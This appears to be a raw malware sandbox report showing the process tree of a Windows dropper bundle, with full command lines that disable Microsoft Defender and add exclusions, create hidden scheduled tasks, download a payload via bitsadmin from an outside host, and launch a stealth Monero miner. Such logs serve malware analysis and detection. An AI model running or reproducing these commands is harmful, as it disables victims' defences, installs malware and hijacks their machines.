C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &11⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True13⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"11⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&12⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3213⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6413⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"11⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&12⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3213⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6413⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gYUSnSWDi" /SC once /ST 07:40:42 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="11⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gYUSnSWDi"11⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gYUSnSWDi"11⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bvmcjEjDUxHOOxIZsK" /SC once /ST 21:37:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\ZVZTVMi.exe\" uG /site_id 668658 /S" /V1 /F11⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\OtZ3Bgr_O8lNYovkhfW9MgZl.exe"C:\Users\Admin\Documents\OtZ3Bgr_O8lNYovkhfW9MgZl.exe" silent8⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\Documents\IX1zGxX9efDhwsZ12BGQ_ajS.exe"C:\Users\Admin\Documents\IX1zGxX9efDhwsZ12BGQ_ajS.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-9NDEN.tmp\IX1zGxX9efDhwsZ12BGQ_ajS.tmp"C:\Users\Admin\AppData\Local\Temp\is-9NDEN.tmp\IX1zGxX9efDhwsZ12BGQ_ajS.tmp" /SL5="$40618,506127,422400,C:\Users\Admin\Documents\IX1zGxX9efDhwsZ12BGQ_ajS.exe"9⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\is-BQNVG.tmp\Sharefolder.exe"C:\Users\Admin\AppData\Local\Temp\is-BQNVG.tmp\Sharefolder.exe" /S /UID=270910⤵
-
C:\Users\Admin\AppData\Local\Temp\YNYEXAJHFW\foldershare.exe"C:\Users\Admin\AppData\Local\Temp\YNYEXAJHFW\foldershare.exe" /VERYSILENT11⤵
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\AppData\Local\Temp\84-e69be-f3b-24fa7-edbc6f078014c\Qoshaemejyjy.exe"C:\Users\Admin\AppData\Local\Temp\84-e69be-f3b-24fa7-edbc6f078014c\Qoshaemejyjy.exe"11⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\57-db5e6-865-fc28e-e1140a38d9389\Waebaenaehoty.exe"C:\Users\Admin\AppData\Local\Temp\57-db5e6-865-fc28e-e1140a38d9389\Waebaenaehoty.exe"11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dr0z1sou.qsq\GcleanerEU.exe /eufive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\dr0z1sou.qsq\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\dr0z1sou.qsq\GcleanerEU.exe /eufive13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5qvdmsvd.4x5\installer.exe /qn CAMPAIGN="654" & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\5qvdmsvd.4x5\installer.exeC:\Users\Admin\AppData\Local\Temp\5qvdmsvd.4x5\installer.exe /qn CAMPAIGN="654"13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\otoeqaih.vus\any.exe & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\otoeqaih.vus\any.exeC:\Users\Admin\AppData\Local\Temp\otoeqaih.vus\any.exe13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pqueirte.b1e\gcleaner.exe /mixfive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\pqueirte.b1e\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\pqueirte.b1e\gcleaner.exe /mixfive13⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\pqueirte.b1e\gcleaner.exe" & exit14⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "gcleaner.exe" /f15⤵
- Kills process with taskkill
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gbzxo0dp.tfy\autosubplayer.exe /S & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\gbzxo0dp.tfy\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\gbzxo0dp.tfy\autosubplayer.exe /S13⤵
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh2AED.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh2AED.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh2AED.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh2AED.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh2AED.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh2AED.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh2AED.tmp\tempfile.ps1"14⤵
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://lighteningstoragecenter.com/data/data.7z C:\zip.7z14⤵
- Download via BitsAdmin
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV115⤵
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -piKZNpnxj7ps2Vba -y x C:\zip.7z -o"C:\Program Files\temp_files\"14⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pZy3DKDGFkSCqK3x -y x C:\zip.7z -o"C:\Program Files\temp_files\"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh2AED.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh2AED.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh2AED.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh2AED.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh2AED.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\OnpGSK\OnpGSK.dll" OnpGSK14⤵
-
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\OnpGSK\OnpGSK.dll" OnpGSK15⤵
- Drops file in System32 directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh2AED.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh2AED.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh2AED.tmp\tempfile.ps1"14⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh2AED.tmp\tempfile.ps1"14⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh2AED.tmp\tempfile.ps1"14⤵
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT14⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
-
C:\Users\Admin\Documents\cOSvj6_TfVEcVvnn5pGOY1Gg.exe"C:\Users\Admin\Documents\cOSvj6_TfVEcVvnn5pGOY1Gg.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\cOSvj6_TfVEcVvnn5pGOY1Gg.exe"C:\Users\Admin\Documents\cOSvj6_TfVEcVvnn5pGOY1Gg.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1364 -s 9367⤵
- Program crash
-
C:\Users\Admin\Documents\p6qIMjwiMtneHlcgDQwJordB.exe"C:\Users\Admin\Documents\p6qIMjwiMtneHlcgDQwJordB.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8108 -s 2447⤵
- Program crash
-
C:\Users\Admin\Documents\ccXimH7DCVZOVguRTTQtED4r.exe"C:\Users\Admin\Documents\ccXimH7DCVZOVguRTTQtED4r.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\5123157.scr"C:\Users\Admin\AppData\Roaming\5123157.scr" /S7⤵
-
C:\Users\Admin\AppData\Roaming\1477080.scr"C:\Users\Admin\AppData\Roaming\1477080.scr" /S7⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\6642635.scr"C:\Users\Admin\AppData\Roaming\6642635.scr" /S7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\6729582.scr"C:\Users\Admin\AppData\Roaming\6729582.scr" /S7⤵
-
C:\Users\Admin\Documents\3wIhaEv7Ltp2XU8bgsQTib5q.exe"C:\Users\Admin\Documents\3wIhaEv7Ltp2XU8bgsQTib5q.exe"6⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\Z2ECp8JodQbWGsvkzsmoyMv5.exe"C:\Users\Admin\Documents\Z2ECp8JodQbWGsvkzsmoyMv5.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\Z58YFjny287dHiWTdWlvNYF0.exe"C:\Users\Admin\Documents\Z58YFjny287dHiWTdWlvNYF0.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\Rz3nzm_MIHXb0zRRpyo8WLSo.exe"C:\Users\Admin\Documents\Rz3nzm_MIHXb0zRRpyo8WLSo.exe"6⤵
-
C:\Program Files (x86)\Company\NewProduct\Installer.exe"C:\Program Files (x86)\Company\NewProduct\Installer.exe"7⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Helper.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Helper.exe8⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Helper.exe"C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Helper.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Helper.exe"C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Helper.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Helper.exe"C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Helper.exe"9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Helper.exe"9⤵
-
C:\Program Files (x86)\Company\NewProduct\cm3.exe"C:\Program Files (x86)\Company\NewProduct\cm3.exe"7⤵
-
C:\Users\Admin\Documents\OITjDfOmO1EwVIRrcSQjebGx.exe"C:\Users\Admin\Documents\OITjDfOmO1EwVIRrcSQjebGx.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\_8q1PSDQqSKVkw8kGBqzosdZ.exe"C:\Users\Admin\Documents\_8q1PSDQqSKVkw8kGBqzosdZ.exe"6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed154a69e494d5e99ca.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed154a69e494d5e99ca.exeWed154a69e494d5e99ca.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵
- Executes dropped EXE
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵
-
C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe"C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Firstoffer.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe" & del C:\ProgramData\*.dll & exit8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Firstoffer.exe /f9⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\inst3.exe"C:\Users\Admin\AppData\Local\Temp\inst3.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_t1.exe"C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_t1.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 3368⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 4848⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 5008⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 4648⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 5568⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 5408⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 5608⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\Install.EXE"C:\Users\Admin\AppData\Local\Temp\Install.EXE"7⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe"9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\INSTAL~1.EXEC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\INSTAL~1.EXE8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zS900C.tmp\Install.cmd" "9⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\6571754.scr"C:\Users\Admin\AppData\Roaming\6571754.scr" /S8⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\5795491.scr"C:\Users\Admin\AppData\Roaming\5795491.scr" /S8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\2610751.scr"C:\Users\Admin\AppData\Roaming\2610751.scr" /S8⤵
- Executes dropped EXE
-
